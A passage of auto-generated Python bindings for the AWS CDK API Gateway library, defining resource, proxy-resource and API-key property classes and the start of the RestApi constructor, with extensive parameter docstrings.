:param request_parameters: The request parameters that API Gateway accepts. Specify request parameters as key-value pairs (string-to-Boolean mapping), with a source as the key and a Boolean as the value. The Boolean specifies whether a parameter is required. A source must match the format method.request.location.name, where the location is querystring, path, or header, and name is a valid, unique parameter name. Default: None
:param request_validator: The ID of the associated request validator.
"""
options = MethodOptions(api_key_required=api_key_required, authorization_type=authorization_type, authorizer=authorizer, method_responses=method_responses, operation_name=operation_name, request_models=request_models, request_parameters=request_parameters, request_validator=request_validator)
return jsii.invoke(self, "addMethod", [http_method, integration, options])
@jsii.member(jsii_name="addProxy")
def add_proxy(self, *, any_method: typing.Optional[bool]=None, default_cors_preflight_options: typing.Optional["CorsOptions"]=None, default_integration: typing.Optional["Integration"]=None, default_method_options: typing.Optional["MethodOptions"]=None) -> "ProxyResource":
"""Adds a greedy proxy resource ("{proxy+}") and an ANY method to this route.
:param options: -
:param any_method: Adds an "ANY" method to this resource. If set to ``false``, you will have to explicitly add methods to this resource after it's created. Default: true
:param default_cors_preflight_options: Adds a CORS preflight OPTIONS method to this resource and all child resources. You can add CORS at the resource-level using ``addCorsPreflight``. Default: - CORS is disabled
:param default_integration: An integration to use as a default for all methods created within this API unless an integration is specified. Default: - Inherited from parent.
:param default_method_options: Method options to use as a default for all methods created within this API unless custom options are specified. Default: - Inherited from parent.
"""
options = ProxyResourceOptions(any_method=any_method, default_cors_preflight_options=default_cors_preflight_options, default_integration=default_integration, default_method_options=default_method_options)
return jsii.invoke(self, "addProxy", [options])
@jsii.member(jsii_name="addResource")
def add_resource(self, path_part: str, *, default_cors_preflight_options: typing.Optional["CorsOptions"]=None, default_integration: typing.Optional["Integration"]=None, default_method_options: typing.Optional["MethodOptions"]=None) -> "Resource":
"""Defines a new child resource where this resource is the parent.
:param path_part: -
:param options: -
:param default_cors_preflight_options: Adds a CORS preflight OPTIONS method to this resource and all child resources. You can add CORS at the resource-level using ``addCorsPreflight``. Default: - CORS is disabled
:param default_integration: An integration to use as a default for all methods created within this API unless an integration is specified. Default: - Inherited from parent.
:param default_method_options: Method options to use as a default for all methods created within this API unless custom options are specified. Default: - Inherited from parent.
"""
options = ResourceOptions(default_cors_preflight_options=default_cors_preflight_options, default_integration=default_integration, default_method_options=default_method_options)
return jsii.invoke(self, "addResource", [path_part, options])
@jsii.member(jsii_name="getResource")
def get_resource(self, path_part: str) -> typing.Optional["IResource"]:
"""Retrieves a child resource by path part.
:param path_part: -
"""
return jsii.invoke(self, "getResource", [path_part])
@jsii.member(jsii_name="resourceForPath")
def resource_for_path(self, path: str) -> "Resource":
"""Gets or create all resources leading up to the specified path.
- Path may only start with "/" if this method is called on the root resource.
- All resources are created using default options.
:param path: -
"""
return jsii.invoke(self, "resourceForPath", [path])
@property
@jsii.member(jsii_name="path")
@abc.abstractmethod
def path(self) -> str:
"""The full path of this resuorce."""
...
@property
@jsii.member(jsii_name="resourceId")
@abc.abstractmethod
def resource_id(self) -> str:
"""The ID of the resource."""
...
@property
@jsii.member(jsii_name="restApi")
@abc.abstractmethod
def rest_api(self) -> "RestApi":
"""The rest API that this resource is part of.
The reason we need the RestApi object itself and not just the ID is because the model
is being tracked by the top-level RestApi object for the purpose of calculating it's
hash to determine the ID of the deployment. This allows us to automatically update
the deployment when the model of the REST API changes.
"""
...
@property
@jsii.member(jsii_name="url")
def url(self) -> str:
return jsii.get(self, "url")
@property
@jsii.member(jsii_name="defaultCorsPreflightOptions")
@abc.abstractmethod
def default_cors_preflight_options(self) -> typing.Optional["CorsOptions"]:
"""Default options for CORS preflight OPTIONS method."""
...
@property
@jsii.member(jsii_name="defaultIntegration")
@abc.abstractmethod
def default_integration(self) -> typing.Optional["Integration"]:
"""An integration to use as a default for all methods created within this API unless an integration is specified."""
...
@property
@jsii.member(jsii_name="defaultMethodOptions")
@abc.abstractmethod
def default_method_options(self) -> typing.Optional["MethodOptions"]:
"""Method options to use as a default for all methods created within this API unless custom options are specified."""
...
@property
@jsii.member(jsii_name="parentResource")
@abc.abstractmethod
def parent_resource(self) -> typing.Optional["IResource"]:
"""The parent of this resource or undefined for the root resource."""
...
class _ResourceBaseProxy(ResourceBase, jsii.proxy_for(aws_cdk.core.Resource)):
@property
@jsii.member(jsii_name="path")
def path(self) -> str:
"""The full path of this resuorce."""
return jsii.get(self, "path")
@property
@jsii.member(jsii_name="resourceId")
def resource_id(self) -> str:
"""The ID of the resource."""
return jsii.get(self, "resourceId")
@property
@jsii.member(jsii_name="restApi")
def rest_api(self) -> "RestApi":
"""The rest API that this resource is part of.
The reason we need the RestApi object itself and not just the ID is because the model
is being tracked by the top-level RestApi object for the purpose of calculating it's
hash to determine the ID of the deployment. This allows us to automatically update
the deployment when the model of the REST API changes.
"""
return jsii.get(self, "restApi")
@property
@jsii.member(jsii_name="defaultCorsPreflightOptions")
def default_cors_preflight_options(self) -> typing.Optional["CorsOptions"]:
"""Default options for CORS preflight OPTIONS method."""
return jsii.get(self, "defaultCorsPreflightOptions")
@property
@jsii.member(jsii_name="defaultIntegration")
def default_integration(self) -> typing.Optional["Integration"]:
"""An integration to use as a default for all methods created within this API unless an integration is specified."""
return jsii.get(self, "defaultIntegration")
@property
@jsii.member(jsii_name="defaultMethodOptions")
def default_method_options(self) -> typing.Optional["MethodOptions"]:
"""Method options to use as a default for all methods created within this API unless custom options are specified."""
return jsii.get(self, "defaultMethodOptions")
@property
@jsii.member(jsii_name="parentResource")
def parent_resource(self) -> typing.Optional["IResource"]:
"""The parent of this resource or undefined for the root resource."""
return jsii.get(self, "parentResource")
class Resource(ResourceBase, metaclass=jsii.JSIIMeta, jsii_type="@aws-cdk/aws-apigateway.Resource"):
def __init__(self, scope: aws_cdk.core.Construct, id: str, *, parent: "IResource", path_part: str, default_cors_preflight_options: typing.Optional["CorsOptions"]=None, default_integration: typing.Optional["Integration"]=None, default_method_options: typing.Optional["MethodOptions"]=None) -> None:
"""
:param scope: -
:param id: -
:param props: -
:param parent: The parent resource of this resource. You can either pass another ``Resource`` object or a ``RestApi`` object here.
:param path_part: A path name for the resource.
:param default_cors_preflight_options: Adds a CORS preflight OPTIONS method to this resource and all child resources. You can add CORS at the resource-level using ``addCorsPreflight``. Default: - CORS is disabled
:param default_integration: An integration to use as a default for all methods created within this API unless an integration is specified. Default: - Inherited from parent.
:param default_method_options: Method options to use as a default for all methods created within this API unless custom options are specified. Default: - Inherited from parent.
"""
props = ResourceProps(parent=parent, path_part=path_part, default_cors_preflight_options=default_cors_preflight_options, default_integration=default_integration, default_method_options=default_method_options)
jsii.create(Resource, self, [scope, id, props])
@property
@jsii.member(jsii_name="path")
def path(self) -> str:
"""The full path of this resuorce."""
return jsii.get(self, "path")
@property
@jsii.member(jsii_name="resourceId")
def resource_id(self) -> str:
"""The ID of the resource."""
return jsii.get(self, "resourceId")
@property
@jsii.member(jsii_name="restApi")
def rest_api(self) -> "RestApi":
"""The rest API that this resource is part of.
The reason we need the RestApi object itself and not just the ID is because the model
is being tracked by the top-level RestApi object for the purpose of calculating it's
hash to determine the ID of the deployment. This allows us to automatically update
the deployment when the model of the REST API changes.
"""
return jsii.get(self, "restApi")
@property
@jsii.member(jsii_name="defaultCorsPreflightOptions")
def default_cors_preflight_options(self) -> typing.Optional["CorsOptions"]:
"""Default options for CORS preflight OPTIONS method."""
return jsii.get(self, "defaultCorsPreflightOptions")
@property
@jsii.member(jsii_name="defaultIntegration")
def default_integration(self) -> typing.Optional["Integration"]:
"""An integration to use as a default for all methods created within this API unless an integration is specified."""
return jsii.get(self, "defaultIntegration")
@property
@jsii.member(jsii_name="defaultMethodOptions")
def default_method_options(self) -> typing.Optional["MethodOptions"]:
"""Method options to use as a default for all methods created within this API unless custom options are specified."""
return jsii.get(self, "defaultMethodOptions")
@property
@jsii.member(jsii_name="parentResource")
def parent_resource(self) -> typing.Optional["IResource"]:
"""The parent of this resource or undefined for the root resource."""
return jsii.get(self, "parentResource")
class ProxyResource(Resource, metaclass=jsii.JSIIMeta, jsii_type="@aws-cdk/aws-apigateway.ProxyResource"):
"""Defines a {proxy+} greedy resource and an ANY method on a route.
see
:see: https://docs.aws.amazon.com/apigateway/latest/developerguide/api-gateway-set-up-simple-proxy.html
"""
def __init__(self, scope: aws_cdk.core.Construct, id: str, *, parent: "IResource", any_method: typing.Optional[bool]=None, default_cors_preflight_options: typing.Optional["CorsOptions"]=None, default_integration: typing.Optional["Integration"]=None, default_method_options: typing.Optional["MethodOptions"]=None) -> None:
"""
:param scope: -
:param id: -
:param props: -
:param parent: The parent resource of this resource. You can either pass another ``Resource`` object or a ``RestApi`` object here.
:param any_method: Adds an "ANY" method to this resource. If set to ``false``, you will have to explicitly add methods to this resource after it's created. Default: true
:param default_cors_preflight_options: Adds a CORS preflight OPTIONS method to this resource and all child resources. You can add CORS at the resource-level using ``addCorsPreflight``. Default: - CORS is disabled
:param default_integration: An integration to use as a default for all methods created within this API unless an integration is specified. Default: - Inherited from parent.
:param default_method_options: Method options to use as a default for all methods created within this API unless custom options are specified. Default: - Inherited from parent.
"""
props = ProxyResourceProps(parent=parent, any_method=any_method, default_cors_preflight_options=default_cors_preflight_options, default_integration=default_integration, default_method_options=default_method_options)
jsii.create(ProxyResource, self, [scope, id, props])
@jsii.member(jsii_name="addMethod")
def add_method(self, http_method: str, integration: typing.Optional["Integration"]=None, *, api_key_required: typing.Optional[bool]=None, authorization_type: typing.Optional["AuthorizationType"]=None, authorizer: typing.Optional["IAuthorizer"]=None, method_responses: typing.Optional[typing.List["MethodResponse"]]=None, operation_name: typing.Optional[str]=None, request_models: typing.Optional[typing.Mapping[str,"IModel"]]=None, request_parameters: typing.Optional[typing.Mapping[str,bool]]=None, request_validator: typing.Optional["IRequestValidator"]=None) -> "Method":
"""Defines a new method for this resource.
:param http_method: -
:param integration: -
:param options: -
:param api_key_required: Indicates whether the method requires clients to submit a valid API key. Default: false
:param authorization_type: Method authorization. Default: None open access
:param authorizer: If ``authorizationType`` is ``Custom``, this specifies the ID of the method authorizer resource.
:param method_responses: The responses that can be sent to the client who calls the method. Default: None This property is not required, but if these are not supplied for a Lambda proxy integration, the Lambda function must return a value of the correct format, for the integration response to be correctly mapped to a response to the client.
:param operation_name: A friendly operation name for the method. For example, you can assign the OperationName of ListPets for the GET /pets method.
:param request_models: The resources that are used for the response's content type. Specify request models as key-value pairs (string-to-string mapping), with a content type as the key and a Model resource name as the value
:param request_parameters: The request parameters that API Gateway accepts. Specify request parameters as key-value pairs (string-to-Boolean mapping), with a source as the key and a Boolean as the value. The Boolean specifies whether a parameter is required. A source must match the format method.request.location.name, where the location is querystring, path, or header, and name is a valid, unique parameter name. Default: None
:param request_validator: The ID of the associated request validator.
"""
options = MethodOptions(api_key_required=api_key_required, authorization_type=authorization_type, authorizer=authorizer, method_responses=method_responses, operation_name=operation_name, request_models=request_models, request_parameters=request_parameters, request_validator=request_validator)
return jsii.invoke(self, "addMethod", [http_method, integration, options])
@property
@jsii.member(jsii_name="anyMethod")
def any_method(self) -> typing.Optional["Method"]:
"""If ``props.anyMethod`` is ``true``, this will be the reference to the 'ANY' method associated with this proxy resource."""
return jsii.get(self, "anyMethod")
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.ResourceOptions", jsii_struct_bases=[], name_mapping={'default_cors_preflight_options': 'defaultCorsPreflightOptions', 'default_integration': 'defaultIntegration', 'default_method_options': 'defaultMethodOptions'})
class ResourceOptions():
def __init__(self, *, default_cors_preflight_options: typing.Optional["CorsOptions"]=None, default_integration: typing.Optional["Integration"]=None, default_method_options: typing.Optional["MethodOptions"]=None):
"""
:param default_cors_preflight_options: Adds a CORS preflight OPTIONS method to this resource and all child resources. You can add CORS at the resource-level using ``addCorsPreflight``. Default: - CORS is disabled
:param default_integration: An integration to use as a default for all methods created within this API unless an integration is specified. Default: - Inherited from parent.
:param default_method_options: Method options to use as a default for all methods created within this API unless custom options are specified. Default: - Inherited from parent.
"""
if isinstance(default_cors_preflight_options, dict): default_cors_preflight_options = CorsOptions(**default_cors_preflight_options)
if isinstance(default_method_options, dict): default_method_options = MethodOptions(**default_method_options)
self._values = {
}
if default_cors_preflight_options is not None: self._values["default_cors_preflight_options"] = default_cors_preflight_options
if default_integration is not None: self._values["default_integration"] = default_integration
if default_method_options is not None: self._values["default_method_options"] = default_method_options
@property
def default_cors_preflight_options(self) -> typing.Optional["CorsOptions"]:
"""Adds a CORS preflight OPTIONS method to this resource and all child resources.
You can add CORS at the resource-level using ``addCorsPreflight``.
default
:default: - CORS is disabled
"""
return self._values.get('default_cors_preflight_options')
@property
def default_integration(self) -> typing.Optional["Integration"]:
"""An integration to use as a default for all methods created within this API unless an integration is specified.
default
:default: - Inherited from parent.
"""
return self._values.get('default_integration')
@property
def default_method_options(self) -> typing.Optional["MethodOptions"]:
"""Method options to use as a default for all methods created within this API unless custom options are specified.
default
:default: - Inherited from parent.
"""
return self._values.get('default_method_options')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'ResourceOptions(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.ApiKeyProps", jsii_struct_bases=[ResourceOptions], name_mapping={'default_cors_preflight_options': 'defaultCorsPreflightOptions', 'default_integration': 'defaultIntegration', 'default_method_options': 'defaultMethodOptions', 'api_key_name': 'apiKeyName', 'customer_id': 'customerId', 'description': 'description', 'enabled': 'enabled', 'generate_distinct_id': 'generateDistinctId', 'resources': 'resources'})
class ApiKeyProps(ResourceOptions):
def __init__(self, *, default_cors_preflight_options: typing.Optional["CorsOptions"]=None, default_integration: typing.Optional["Integration"]=None, default_method_options: typing.Optional["MethodOptions"]=None, api_key_name: typing.Optional[str]=None, customer_id: typing.Optional[str]=None, description: typing.Optional[str]=None, enabled: typing.Optional[bool]=None, generate_distinct_id: typing.Optional[bool]=None, resources: typing.Optional[typing.List["RestApi"]]=None):
"""ApiKey Properties.
:param default_cors_preflight_options: Adds a CORS preflight OPTIONS method to this resource and all child resources. You can add CORS at the resource-level using ``addCorsPreflight``. Default: - CORS is disabled
:param default_integration: An integration to use as a default for all methods created within this API unless an integration is specified. Default: - Inherited from parent.
:param default_method_options: Method options to use as a default for all methods created within this API unless custom options are specified. Default: - Inherited from parent.
:param api_key_name: A name for the API key. If you don't specify a name, AWS CloudFormation generates a unique physical ID and uses that ID for the API key name. Default: automically generated name
:param customer_id: An AWS Marketplace customer identifier to use when integrating with the AWS SaaS Marketplace. Default: none
:param description: A description of the purpose of the API key. Default: none
:param enabled: Indicates whether the API key can be used by clients. Default: true
:param generate_distinct_id: Specifies whether the key identifier is distinct from the created API key value. Default: false
:param resources: A list of resources this api key is associated with. Default: none
"""
if isinstance(default_cors_preflight_options, dict): default_cors_preflight_options = CorsOptions(**default_cors_preflight_options)
if isinstance(default_method_options, dict): default_method_options = MethodOptions(**default_method_options)
self._values = {
}
if default_cors_preflight_options is not None: self._values["default_cors_preflight_options"] = default_cors_preflight_options
if default_integration is not None: self._values["default_integration"] = default_integration
if default_method_options is not None: self._values["default_method_options"] = default_method_options
if api_key_name is not None: self._values["api_key_name"] = api_key_name
if customer_id is not None: self._values["customer_id"] = customer_id
if description is not None: self._values["description"] = description
if enabled is not None: self._values["enabled"] = enabled
if generate_distinct_id is not None: self._values["generate_distinct_id"] = generate_distinct_id
if resources is not None: self._values["resources"] = resources
@property
def default_cors_preflight_options(self) -> typing.Optional["CorsOptions"]:
"""Adds a CORS preflight OPTIONS method to this resource and all child resources.
You can add CORS at the resource-level using ``addCorsPreflight``.
default
:default: - CORS is disabled
"""
return self._values.get('default_cors_preflight_options')
@property
def default_integration(self) -> typing.Optional["Integration"]:
"""An integration to use as a default for all methods created within this API unless an integration is specified.
default
:default: - Inherited from parent.
"""
return self._values.get('default_integration')
@property
def default_method_options(self) -> typing.Optional["MethodOptions"]:
"""Method options to use as a default for all methods created within this API unless custom options are specified.
default
:default: - Inherited from parent.
"""
return self._values.get('default_method_options')
@property
def api_key_name(self) -> typing.Optional[str]:
"""A name for the API key.
If you don't specify a name, AWS CloudFormation generates a unique physical ID and uses that ID for the API key name.
default
:default: automically generated name
link:
:link:: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-apikey.html#cfn-apigateway-apikey-name
"""
return self._values.get('api_key_name')
@property
def customer_id(self) -> typing.Optional[str]:
"""An AWS Marketplace customer identifier to use when integrating with the AWS SaaS Marketplace.
default
:default: none
link:
:link:: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-apikey.html#cfn-apigateway-apikey-customerid
"""
return self._values.get('customer_id')
@property
def description(self) -> typing.Optional[str]:
"""A description of the purpose of the API key.
default
:default: none
link:
:link:: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-apikey.html#cfn-apigateway-apikey-description
"""
return self._values.get('description')
@property
def enabled(self) -> typing.Optional[bool]:
"""Indicates whether the API key can be used by clients.
default
:default: true
link:
:link:: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-apikey.html#cfn-apigateway-apikey-enabled
"""
return self._values.get('enabled')
@property
def generate_distinct_id(self) -> typing.Optional[bool]:
"""Specifies whether the key identifier is distinct from the created API key value.
default
:default: false
link:
:link:: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-apikey.html#cfn-apigateway-apikey-generatedistinctid
"""
return self._values.get('generate_distinct_id')
@property
def resources(self) -> typing.Optional[typing.List["RestApi"]]:
"""A list of resources this api key is associated with.
default
:default: none
"""
return self._values.get('resources')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'ApiKeyProps(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.ProxyResourceOptions", jsii_struct_bases=[ResourceOptions], name_mapping={'default_cors_preflight_options': 'defaultCorsPreflightOptions', 'default_integration': 'defaultIntegration', 'default_method_options': 'defaultMethodOptions', 'any_method': 'anyMethod'})
class ProxyResourceOptions(ResourceOptions):
def __init__(self, *, default_cors_preflight_options: typing.Optional["CorsOptions"]=None, default_integration: typing.Optional["Integration"]=None, default_method_options: typing.Optional["MethodOptions"]=None, any_method: typing.Optional[bool]=None):
"""
:param default_cors_preflight_options: Adds a CORS preflight OPTIONS method to this resource and all child resources. You can add CORS at the resource-level using ``addCorsPreflight``. Default: - CORS is disabled
:param default_integration: An integration to use as a default for all methods created within this API unless an integration is specified. Default: - Inherited from parent.
:param default_method_options: Method options to use as a default for all methods created within this API unless custom options are specified. Default: - Inherited from parent.
:param any_method: Adds an "ANY" method to this resource. If set to ``false``, you will have to explicitly add methods to this resource after it's created. Default: true
"""
if isinstance(default_cors_preflight_options, dict): default_cors_preflight_options = CorsOptions(**default_cors_preflight_options)
if isinstance(default_method_options, dict): default_method_options = MethodOptions(**default_method_options)
self._values = {
}
if default_cors_preflight_options is not None: self._values["default_cors_preflight_options"] = default_cors_preflight_options
if default_integration is not None: self._values["default_integration"] = default_integration
if default_method_options is not None: self._values["default_method_options"] = default_method_options
if any_method is not None: self._values["any_method"] = any_method
@property
def default_cors_preflight_options(self) -> typing.Optional["CorsOptions"]:
"""Adds a CORS preflight OPTIONS method to this resource and all child resources.
You can add CORS at the resource-level using ``addCorsPreflight``.
default
:default: - CORS is disabled
"""
return self._values.get('default_cors_preflight_options')
@property
def default_integration(self) -> typing.Optional["Integration"]:
"""An integration to use as a default for all methods created within this API unless an integration is specified.
default
:default: - Inherited from parent.
"""
return self._values.get('default_integration')
@property
def default_method_options(self) -> typing.Optional["MethodOptions"]:
"""Method options to use as a default for all methods created within this API unless custom options are specified.
default
:default: - Inherited from parent.
"""
return self._values.get('default_method_options')
@property
def any_method(self) -> typing.Optional[bool]:
"""Adds an "ANY" method to this resource.
If set to ``false``, you will have to explicitly
add methods to this resource after it's created.
default
:default: true
"""
return self._values.get('any_method')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'ProxyResourceOptions(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.ProxyResourceProps", jsii_struct_bases=[ProxyResourceOptions], name_mapping={'default_cors_preflight_options': 'defaultCorsPreflightOptions', 'default_integration': 'defaultIntegration', 'default_method_options': 'defaultMethodOptions', 'any_method': 'anyMethod', 'parent': 'parent'})
class ProxyResourceProps(ProxyResourceOptions):
def __init__(self, *, default_cors_preflight_options: typing.Optional["CorsOptions"]=None, default_integration: typing.Optional["Integration"]=None, default_method_options: typing.Optional["MethodOptions"]=None, any_method: typing.Optional[bool]=None, parent: "IResource"):
"""
:param default_cors_preflight_options: Adds a CORS preflight OPTIONS method to this resource and all child resources. You can add CORS at the resource-level using ``addCorsPreflight``. Default: - CORS is disabled
:param default_integration: An integration to use as a default for all methods created within this API unless an integration is specified. Default: - Inherited from parent.
:param default_method_options: Method options to use as a default for all methods created within this API unless custom options are specified. Default: - Inherited from parent.
:param any_method: Adds an "ANY" method to this resource. If set to ``false``, you will have to explicitly add methods to this resource after it's created. Default: true
:param parent: The parent resource of this resource. You can either pass another ``Resource`` object or a ``RestApi`` object here.
"""
if isinstance(default_cors_preflight_options, dict): default_cors_preflight_options = CorsOptions(**default_cors_preflight_options)
if isinstance(default_method_options, dict): default_method_options = MethodOptions(**default_method_options)
self._values = {
'parent': parent,
}
if default_cors_preflight_options is not None: self._values["default_cors_preflight_options"] = default_cors_preflight_options
if default_integration is not None: self._values["default_integration"] = default_integration
if default_method_options is not None: self._values["default_method_options"] = default_method_options
if any_method is not None: self._values["any_method"] = any_method
@property
def default_cors_preflight_options(self) -> typing.Optional["CorsOptions"]:
"""Adds a CORS preflight OPTIONS method to this resource and all child resources.
You can add CORS at the resource-level using ``addCorsPreflight``.
default
:default: - CORS is disabled
"""
return self._values.get('default_cors_preflight_options')
@property
def default_integration(self) -> typing.Optional["Integration"]:
"""An integration to use as a default for all methods created within this API unless an integration is specified.
default
:default: - Inherited from parent.
"""
return self._values.get('default_integration')
@property
def default_method_options(self) -> typing.Optional["MethodOptions"]:
"""Method options to use as a default for all methods created within this API unless custom options are specified.
default
:default: - Inherited from parent.
"""
return self._values.get('default_method_options')
@property
def any_method(self) -> typing.Optional[bool]:
"""Adds an "ANY" method to this resource.
If set to ``false``, you will have to explicitly
add methods to this resource after it's created.
default
:default: true
"""
return self._values.get('any_method')
@property
def parent(self) -> "IResource":
"""The parent resource of this resource.
You can either pass another
``Resource`` object or a ``RestApi`` object here.
"""
return self._values.get('parent')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'ProxyResourceProps(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.ResourceProps", jsii_struct_bases=[ResourceOptions], name_mapping={'default_cors_preflight_options': 'defaultCorsPreflightOptions', 'default_integration': 'defaultIntegration', 'default_method_options': 'defaultMethodOptions', 'parent': 'parent', 'path_part': 'pathPart'})
class ResourceProps(ResourceOptions):
def __init__(self, *, default_cors_preflight_options: typing.Optional["CorsOptions"]=None, default_integration: typing.Optional["Integration"]=None, default_method_options: typing.Optional["MethodOptions"]=None, parent: "IResource", path_part: str):
"""
:param default_cors_preflight_options: Adds a CORS preflight OPTIONS method to this resource and all child resources. You can add CORS at the resource-level using ``addCorsPreflight``. Default: - CORS is disabled
:param default_integration: An integration to use as a default for all methods created within this API unless an integration is specified. Default: - Inherited from parent.
:param default_method_options: Method options to use as a default for all methods created within this API unless custom options are specified. Default: - Inherited from parent.
:param parent: The parent resource of this resource. You can either pass another ``Resource`` object or a ``RestApi`` object here.
:param path_part: A path name for the resource.
"""
if isinstance(default_cors_preflight_options, dict): default_cors_preflight_options = CorsOptions(**default_cors_preflight_options)
if isinstance(default_method_options, dict): default_method_options = MethodOptions(**default_method_options)
self._values = {
'parent': parent,
'path_part': path_part,
}
if default_cors_preflight_options is not None: self._values["default_cors_preflight_options"] = default_cors_preflight_options
if default_integration is not None: self._values["default_integration"] = default_integration
if default_method_options is not None: self._values["default_method_options"] = default_method_options
@property
def default_cors_preflight_options(self) -> typing.Optional["CorsOptions"]:
"""Adds a CORS preflight OPTIONS method to this resource and all child resources.
You can add CORS at the resource-level using ``addCorsPreflight``.
default
:default: - CORS is disabled
"""
return self._values.get('default_cors_preflight_options')
@property
def default_integration(self) -> typing.Optional["Integration"]:
"""An integration to use as a default for all methods created within this API unless an integration is specified.
default
:default: - Inherited from parent.
"""
return self._values.get('default_integration')
@property
def default_method_options(self) -> typing.Optional["MethodOptions"]:
"""Method options to use as a default for all methods created within this API unless custom options are specified.
default
:default: - Inherited from parent.
"""
return self._values.get('default_method_options')
@property
def parent(self) -> "IResource":
"""The parent resource of this resource.
You can either pass another
``Resource`` object or a ``RestApi`` object here.
"""
return self._values.get('parent')
@property
def path_part(self) -> str:
"""A path name for the resource."""
return self._values.get('path_part')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'ResourceProps(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
@jsii.implements(IRestApi)
class RestApi(aws_cdk.core.Resource, metaclass=jsii.JSIIMeta, jsii_type="@aws-cdk/aws-apigateway.RestApi"):
"""Represents a REST API in Amazon API Gateway.
Use ``addResource`` and ``addMethod`` to configure the API model.
By default, the API will automatically be deployed and accessible from a
public endpoint.
"""
def __init__(self, scope: aws_cdk.core.Construct, id: str, *, api_key_source_type: typing.Optional["ApiKeySourceType"]=None, binary_media_types: typing.Optional[typing.List[str]]=None, clone_from: typing.Optional["IRestApi"]=None, cloud_watch_role: typing.Optional[bool]=None, deploy: typing.Optional[bool]=None, deploy_options: typing.Optional["StageOptions"]=None, description: typing.Optional[str]=None, domain_name: typing.Optional["DomainNameOptions"]=None, endpoint_export_name: typing.Optional[str]=None, endpoint_types: typing.Optional[typing.List["EndpointType"]]=None, fail_on_warnings: typing.Optional[bool]=None, minimum_compression_size: typing.Optional[jsii.Number]=None, parameters: typing.Optional[typing.Mapping[str,str]]=None, policy: typing.Optional[aws_cdk.aws_iam.PolicyDocument]=None, rest_api_name: typing.Optional[str]=None, retain_deployments: typing.Optional[bool]=None, default_cors_preflight_options: typing.Optional["CorsOptions"]=None, default_integration: typing.Optional["Integration"]=None, default_method_options: typing.Optional["MethodOptions"]=None) -> None:
"""
:param scope: -
:param id: -
:param props: -
:param api_key_source_type: The source of the API key for metering requests according to a usage plan. Default: - Metering is disabled.
:param binary_media_types: The list of binary media mime-types that are supported by the RestApi resource, such as "image/png" or "application/octet-stream". Default: - RestApi supports only UTF-8-encoded text payloads.
:param clone_from: The ID of the API Gateway RestApi resource that you want to clone. Default: - None.
:param cloud_watch_role: Automatically configure an AWS CloudWatch role for API Gateway. Default: true
:param deploy: Indicates if a Deployment should be automatically created for this API, and recreated when the API model (resources, methods) changes. Since API Gateway deployments are immutable, When this option is enabled (by default), an AWS::ApiGateway::Deployment resource will automatically created with a logical ID that hashes the API model (methods, resources and options). This means that when the model changes, the logical ID of this CloudFormation resource will change, and a new deployment will be created. If this is set, ``latestDeployment`` will refer to the ``Deployment`` object and ``deploymentStage`` will refer to a ``Stage`` that points to this deployment. To customize the stage options, use the ``deployStageOptions`` property. A CloudFormation Output will also be defined with the root URL endpoint of this REST API. Default: true
:param deploy_options: Options for the API Gateway stage that will always point to the latest deployment when ``deploy`` is enabled. If ``deploy`` is disabled, this value cannot be set. Default: - Based on defaults of ``StageOptions``.
:param description: A description of the purpose of this API Gateway RestApi resource. Default: - No description.
:param domain_name: Configure a custom domain name and map it to this API. Default: - no domain name is defined, use ``addDomainName`` or directly define a ``DomainName``.
:param endpoint_export_name: Export name for the CfnOutput containing the API endpoint. Default: - when no export name is given, output will be created without export
:param endpoint_types: A list of the endpoint types of the API. Use this property when creating an API. Default: - No endpoint types.
:param fail_on_warnings: Indicates whether to roll back the resource if a warning occurs while API Gateway is creating the RestApi resource. Default: false
:param minimum_compression_size: A nullable integer that is used to enable compression (with non-negative between 0 and 10485760 (10M) bytes, inclusive) or disable compression (when undefined) on an API. When compression is enabled, compression or decompression is not applied on the payload if the payload size is smaller than this value. Setting it to zero allows compression for any payload size. Default: - Compression is disabled.
:param parameters: Custom header parameters for the request. Default: - No parameters.
:param policy: A policy document that contains the permissions for this RestApi. Default: - No policy.
:param rest_api_name: A name for the API Gateway RestApi resource. Default: - ID of the RestApi construct.
:param retain_deployments: Retains old deployment resources when the API changes. This allows manually reverting stages to point to old deployments via the AWS Console. Default: false
:param default_cors_preflight_options: Adds a CORS preflight OPTIONS method to this resource and all child resources. You can add CORS at the resource-level using ``addCorsPreflight``. Default: - CORS is disabled
:param default_integration: An integration to use as a default for all methods created within this API unless an integration is specified. Default: - Inherited from parent.
:param default_method_options: Method options to use as a default for all methods created within this API unless custom options are specified. Default: - Inherited from parent.
"""
